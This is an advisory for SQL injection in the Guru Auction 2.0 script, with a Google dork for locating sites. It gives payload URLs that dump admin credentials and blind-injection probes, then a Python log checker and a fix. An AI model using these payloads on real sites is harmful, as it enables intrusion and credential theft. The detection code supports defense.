Guru Auction 2.0 Multiple SQL Injection Vulnerabilities

Author : v3n0m
Application : Guru Auction 2.0
Price : $49
Vendor : http://www.guruscript.com/
Google Dork : inurl:subcat.php?cate_id=

SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--

Blind SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false

Admin login:
~~~~~~~~~~
http://domain.tld/[path]/admin/
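
Log check for the two parameters above, added here as an example and not part of the original advisory: it flags any request to subcat.php or detail.php whose cate_id or item_id is not a plain integer. That these ids are always integers in normal use, the combined access-log format, the function name and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Id parameters named in the advisory, keyed by the script that reads them.
ID_PARAMS = {"subcat.php": "cate_id", "detail.php": "item_id"}
# Request field of a combined-format access log line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: legitimate ids are short unsigned integers.
VALID_ID_RE = re.compile(r"\d{1,10}")


def suspicious_requests(log_lines):
    """Return (script, param, decoded_value) for each non-integer id seen."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        script = url.path.rsplit("/", 1)[-1]
        param = ID_PARAMS.get(script)
        if param is None:
            continue  # not one of the scripts from the advisory
        # parse_qsl decodes %xx and '+', so encoded values are checked in clear.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name == param and not VALID_ID_RE.fullmatch(value):
                hits.append((script, name, value))
    return hits


# Constructed sample lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /shop/subcat.php?cate_id=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /shop/subcat.php?cate_id=-9999+union+all+select+null,null,null-- HTTP/1.1" 200 812',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /shop/detail.php?item_id=575 HTTP/1.1" 200 7301',
    '203.0.113.9 - - [01/Jan/2024:10:00:11 +0000] "GET /shop/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 HTTP/1.1" 200 7301',
    '203.0.113.9 - - [01/Jan/2024:10:00:12 +0000] "GET /shop/detail.php?item_id=575%27 HTTP/1.1" 500 310',
    '203.0.113.7 - - [01/Jan/2024:10:00:20 +0000] "GET /shop/index.php?cate_id=abc HTTP/1.1" 200 4410',
]

if __name__ == "__main__":
    for script, name, value in suspicious_requests(SAMPLE_LOG):
        print(f"{script}: {name}={value!r}")
```

The same integer-only rule belongs in the application itself: cast or validate both ids before they reach the query, and bind them as parameters instead of concatenating them into SQL.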